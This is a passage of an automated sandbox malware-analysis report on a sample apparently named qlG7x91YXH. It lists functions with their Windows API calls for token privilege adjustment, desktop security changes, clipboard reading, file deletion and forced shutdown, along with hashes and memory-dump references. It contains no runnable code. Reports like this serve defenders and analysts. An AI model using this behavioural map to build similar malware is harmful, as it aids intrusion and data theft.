                                              • CloseHandle.KERNEL32(?), ref: 00DD12B9
                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DD12D1
                                              • GetProcessWindowStation.USER32 ref: 00DD12EA
                                              • SetProcessWindowStation.USER32(00000000), ref: 00DD12F4
                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DD1310
                                                • Part of subcall function 00DD10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD11FC), ref: 00DD10D4
                                                • Part of subcall function 00DD10BF: CloseHandle.KERNEL32(?,?,00DD11FC), ref: 00DD10E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                              • String ID: $default$winsta0$Z
                                              • API String ID: 22674027-1808616255
                                              • Opcode ID: 3e83e02a2b1e80d433c167f2d8c1dd9b4f4a75bb589e01aadb0bdc7ac6d12360
                                              • Instruction ID: 814d9808cc3074dde86d4c95a641df6d1c7c11652b54c2296654471fd6f049e1
                                              • Opcode Fuzzy Hash: 3e83e02a2b1e80d433c167f2d8c1dd9b4f4a75bb589e01aadb0bdc7ac6d12360
                                              • Instruction Fuzzy Hash: C7817B75900209BFDF219FA5DC49BEE7BB9EF04704F18422AF910B62A0D7769985CB70
                                              Function 00DD0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                                • Part of subcall function 00DD10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                                • Part of subcall function 00DD10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                                • Part of subcall function 00DD10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD1136
                                                • Part of subcall function 00DD10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0BCC
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0C00
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0C17
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0C51
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0C6D
                                              • GetLengthSid.ADVAPI32(?), ref: 00DD0C84
                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0C8C
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DD0C93
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0CB4
                                              • CopySid.ADVAPI32(00000000), ref: 00DD0CBB
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0CEA
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0D0C
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0D1E
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D45
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D4C
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D55
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D5C
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0D65
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D6C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0D78
                                              • HeapFree.KERNEL32(00000000), ref: 00DD0D7F
                                                • Part of subcall function 00DD1193: GetProcessHeap.KERNEL32(00000008,00DD0BB1,?,00000000,?,00DD0BB1,?), ref: 00DD11A1
                                                • Part of subcall function 00DD1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00DD11A8
                                                • Part of subcall function 00DD1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0BB1,?), ref: 00DD11B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                              • String ID:
                                              • API String ID: 4042927181-0
                                              • Opcode ID: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                              • Instruction ID: 30358d291a78cd4a28cfb2ffd5f8e58d179efe371718531698e72ddaf5fc45e3
                                              • Opcode Fuzzy Hash: a7f9334530995c963768f7cfa647bf5e0fc39d6a095ba25edbd3b0a21f7132e2
                                              • Instruction Fuzzy Hash: 6C71487690020AAFDF109FA5DC48BEEBBBDEF45300F184616E914A7291D771AA49CB70
                                              Function 00DEEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32(00E0CC08), ref: 00DEEB29
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DEEB37
                                              • GetClipboardData.USER32(0000000D), ref: 00DEEB43
                                              • CloseClipboard.USER32 ref: 00DEEB4F
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEB87
                                              • CloseClipboard.USER32 ref: 00DEEB91
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DEEBBC
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00DEEBC9
                                              • GetClipboardData.USER32(00000001), ref: 00DEEBD1
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEBE2
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DEEC22
                                              • IsClipboardFormatAvailable.USER32(0000000F), ref: 00DEEC38
                                              • GetClipboardData.USER32(0000000F), ref: 00DEEC44
                                              • GlobalLock.KERNEL32(00000000), ref: 00DEEC55
                                              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DEEC77
                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEEC94
                                              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DEECD2
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DEECF3
                                              • CountClipboardFormats.USER32 ref: 00DEED14
                                              • CloseClipboard.USER32 ref: 00DEED59
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                              • String ID:
                                              • API String ID: 420908878-0
                                              • Opcode ID: a422bcf687ab154a1df0df9660f5c28dafd7a03e55ad147ca9bab72e93a779e6
                                              • Instruction ID: ea206b3fffdb9920621f0301a96e29569fdb36519715931a687c37f5a1173a43
                                              • Opcode Fuzzy Hash: a422bcf687ab154a1df0df9660f5c28dafd7a03e55ad147ca9bab72e93a779e6
                                              • Instruction Fuzzy Hash: 6A61E3352042419FD310EF26DC95F2AB7A4EF84704F28461DF49A972A2DB72DD49CBB2
                                              Function 00E0911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfilenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • DragQueryPoint.SHELL32(?,?), ref: 00E09147
                                                • Part of subcall function 00E07674: ClientToScreen.USER32(?,?), ref: 00E0769A
                                                • Part of subcall function 00E07674: GetWindowRect.USER32(?,?), ref: 00E07710
                                                • Part of subcall function 00E07674: PtInRect.USER32(?,?,00E08B89), ref: 00E07720
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E091B0
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E091BB
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E091DE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E09225
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E0923E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09255
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09277
                                              • DragFinish.SHELL32(?), ref: 00E0927E
                                              • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00E09371
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                              • API String ID: 4085959399-136824727
                                              • Opcode ID: 1f4fe656bec7ad0bea85a9672c53d0001480a119f219cde00d69cb4f13fbb804
                                              • Instruction ID: c6f737c6a122bd406831a3d2ea7ab4abc7ae6b29473d8dabdfee72c8b1cef335
                                              • Opcode Fuzzy Hash: 1f4fe656bec7ad0bea85a9672c53d0001480a119f219cde00d69cb4f13fbb804
                                              • Instruction Fuzzy Hash: 43617971108301AFC701DF65DC85DAFBBE8EFC9750F104A1DF595A21A1EB319A89CB62
                                              Function 00DE698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE69BE
                                              • FindClose.KERNEL32(00000000), ref: 00DE6A12
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE6A4E
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DE6A75
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE6AB2
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DE6ADF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                              • API String ID: 3830820486-3289030164
                                              • Opcode ID: 6604323858490ec49bd080eb87209c180bfb8c9c0b39920aec5bfefe2a02a536
                                              • Instruction ID: 33607c4b15885bd3d0b1b995b1fd55c480d7b727312ed325a4f9b7aaab588d8a
                                              • Opcode Fuzzy Hash: 6604323858490ec49bd080eb87209c180bfb8c9c0b39920aec5bfefe2a02a536
                                              • Instruction Fuzzy Hash: F4D14F72508340AEC710EBA5C896EABB7ECEF98704F04891DF589D6191FB74DA44CB72
                                              Function 00DE9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DE9663
                                              • GetFileAttributesW.KERNEL32(?), ref: 00DE96A1
                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00DE96BB
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE96D3
                                              • FindClose.KERNEL32(00000000), ref: 00DE96DE
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE96FA
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE974A
                                              • SetCurrentDirectoryW.KERNEL32(00E36B7C), ref: 00DE9768
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE9772
                                              • FindClose.KERNEL32(00000000), ref: 00DE977F
                                              • FindClose.KERNEL32(00000000), ref: 00DE978F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1409584000-438819550
                                              • Opcode ID: 8933412f636b6ba795bb7f5b6a389af7a1a0cc27776be957ca2fc217a2e2c52c
                                              • Instruction ID: 33d9c1f52789d8f3b990dbe8a7f233286d250fda054633067d536e50f04582ad
                                              • Opcode Fuzzy Hash: 8933412f636b6ba795bb7f5b6a389af7a1a0cc27776be957ca2fc217a2e2c52c
                                              • Instruction Fuzzy Hash: 7A31D2325026596EDF10BFB6EC58ADEB7AC9F09321F244166F804F20A1DB31D988CA34
                                              Function 00DE979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00DE97BE
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE9819
                                              • FindClose.KERNEL32(00000000), ref: 00DE9824
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00DE9840
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE9890
                                              • SetCurrentDirectoryW.KERNEL32(00E36B7C), ref: 00DE98AE
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE98B8
                                              • FindClose.KERNEL32(00000000), ref: 00DE98C5
                                              • FindClose.KERNEL32(00000000), ref: 00DE98D5
                                                • Part of subcall function 00DDDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DDDB00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 2640511053-438819550
                                              • Opcode ID: b504536c980388409abc5be8718821ecc7fff1ed0ee746a7ce3ae92d96ea31ba
                                              • Instruction ID: 2097a5405863b4064775b349adee254c4454e328fe07e6868b2ded8d0ca26237
                                              • Opcode Fuzzy Hash: b504536c980388409abc5be8718821ecc7fff1ed0ee746a7ce3ae92d96ea31ba
                                              • Instruction Fuzzy Hash: 5231C2315016596EDF10BFB6EC98ADEB7ACDF06320F244166E810B21E0DB31D989CA74
                                              Function 00DE8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?), ref: 00DE8257
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DE8267
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE8273
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DE8310
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8324
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8356
                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DE838C
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE8395
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CurrentDirectoryTime$File$Local$System
                                              • String ID: *.*
                                              • API String ID: 1464919966-438819550
                                              • Opcode ID: 92c32564c68ca557d22af5dc7db2b26ec62449698f13f0b19c0ad89a42d6b3ec
                                              • Instruction ID: 3c313774d58bc1320b70f2884161a38b3c90e0656775c62bc98532e138021b3d
                                              • Opcode Fuzzy Hash: 92c32564c68ca557d22af5dc7db2b26ec62449698f13f0b19c0ad89a42d6b3ec
                                              • Instruction Fuzzy Hash: CE6155725083459FCB10EF65C8419AEB3E8FF89314F04891EE999D7251EB31E949CBA2
                                              Function 00DDD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DDD122
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00DDD1DD
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDD1F0
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00DDD20D
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DDD237
                                                • Part of subcall function 00DDD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00DDD21C,?,?), ref: 00DDD2B2
                                              • FindClose.KERNEL32(00000000,?,?,?), ref: 00DDD253
                                              • FindClose.KERNEL32(00000000), ref: 00DDD264
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 1946585618-1173974218
                                              • Opcode ID: 20c1e97cffe62f4775b89b37e8fd0ebe203d5c662222e91fdd2b47c320d2b1f1
                                              • Instruction ID: 3c78ce42b50ebe1da178e2c4f7e1721f9100c74ab212ab45fc85eb5f7c4c4699
                                              • Opcode Fuzzy Hash: 20c1e97cffe62f4775b89b37e8fd0ebe203d5c662222e91fdd2b47c320d2b1f1
                                              • Instruction Fuzzy Hash: B9614B3180121DAECF05EBE0D9929EDBB76EF55300F248166E40677292EB31AF09DB71
                                              Function 00DEED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: cf79677a0a00be85b691110158f64c2bd95bc8b987896027d28271fe6093b34b
                                              • Instruction ID: b1c1d117a8f5bf4d73e2c9af947963b89748ee95fccfa46274a0c1e22dc04ed0
                                              • Opcode Fuzzy Hash: cf79677a0a00be85b691110158f64c2bd95bc8b987896027d28271fe6093b34b
                                              • Instruction Fuzzy Hash: CD41EF34604651AFD720EF16E888F19BBE0EF44718F18C199E4599B662C732EC86CBA0
                                              Function 00DDE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DD16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                                • Part of subcall function 00DD16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                                • Part of subcall function 00DD16C3: GetLastError.KERNEL32 ref: 00DD174A
                                              • ExitWindowsEx.USER32(?,00000000), ref: 00DDE932
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $ $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-3163812486
                                              • Opcode ID: 47b0c40420166abd9a0ff79a503794c679e83f3eac62ee7a1c3b0568b2887a52
